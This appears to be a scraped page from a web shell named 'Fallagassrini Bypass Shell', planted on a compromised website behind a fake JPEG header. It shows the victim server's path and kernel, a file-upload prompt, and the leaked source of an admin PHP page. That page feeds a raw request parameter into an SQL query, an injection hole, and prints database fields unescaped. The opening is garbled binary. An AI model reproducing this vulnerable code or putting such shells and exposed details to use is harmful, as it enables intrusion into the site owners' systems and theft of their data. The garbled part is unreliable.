JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/tarinient/domains/tarinienterprises.in/public_html/admin/

Linux venus.ewebguru.net 4.18.0-553.44.1.el8_10.x86_64 #1 SMP Mon Mar 10 05:10:11 EDT 2025 x86_64
Upload File :
Current File : /home/tarinient/domains/tarinienterprises.in/public_html/admin/devicehistory.php

<?php
session_start();
include('../configuration.php');
include("includes/php_devfunction.php");
check_userlogin();

$sqlpl = "select * from tbl_ticket_details where device_id ='".$_REQUEST["nids"]."' ";
$respl = $db->Execute($sqlpl);
$totalpl  = $respl->RecordCount();	
?>
<table width="100%" cellpadding="5" cellspacing="0" border="1" style="border:1px solid #999; border-collapse:collapse; font-size:12px;">
<tr bgcolor="#CCCCCC">
<td colspan="8"><b>Device History Deails</b></td>
</tr>
<tr bgcolor="#999999">
<th height="25" width="10%" align="center">Ticket Id</th>
<th width="12%">Created Date</th>
<th width="34%">Issue</th>
<th width="14%" align="center">Assign to</th>
<th width="10%" align="center">Status</th>
<th width="12%" align="center">PC Name</th>
<th width="8%" align="center">Action</th>
</tr>
<?php
if($totalpl>0){
$bgcol='bgcolor="#FFFFFF"';
while (!$respl->EOF) {


?>
<tr <?php echo $bgcol;?>>
<td align="center"><?php echo $respl->fields["note_id"];?></td>
<td align="center"><?php echo date("d-m-Y",strtotime($respl->fields["added_date"]));?></td>
<td><?php echo $respl->fields["note_details"];?></td>
<td align="center"><?php echo show_empname($respl->fields["assign_to"]);?></td>
<td align="center">
<?php 
if($respl->fields["status"]=='0')
{
?>
<span style="color:#F00;"><b>Open</b></span>
<?php
}
else
{
?>
<span style="color:#030;"><b>Closed</b></span>
<?php	
}
?>
</td>
<td align="center"><?php echo device_pcname($respl->fields["device_id"]);?></td>
<td align="center">
<a href="javascript:void(0);" onclick="viewticket('<?php echo $respl->fields["note_id"];?>');"><img src="img/information.png" border="0" /></a>
&nbsp;&nbsp;&nbsp;

<a href="edittickets.php?cid=<?php echo $respl->fields["cust_id"];?>&tid=<?php echo $respl->fields["note_id"];?>"><img src="img/pencil.png" border="0" /></a></td>
</tr>
<?php

if($bgcol=='bgcolor="#FFFFFF"') { $bgcol='bgcolor="#EFEFEF"';} else { $bgcol='bgcolor="#FFFFFF"';}

$respl->MoveNext();
}

}
else
{
?>
<tr>
<td colspan="7" align="center" height="25"><b>No Device Details found.</b></td>
</tr>
<?php }?>
</table>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net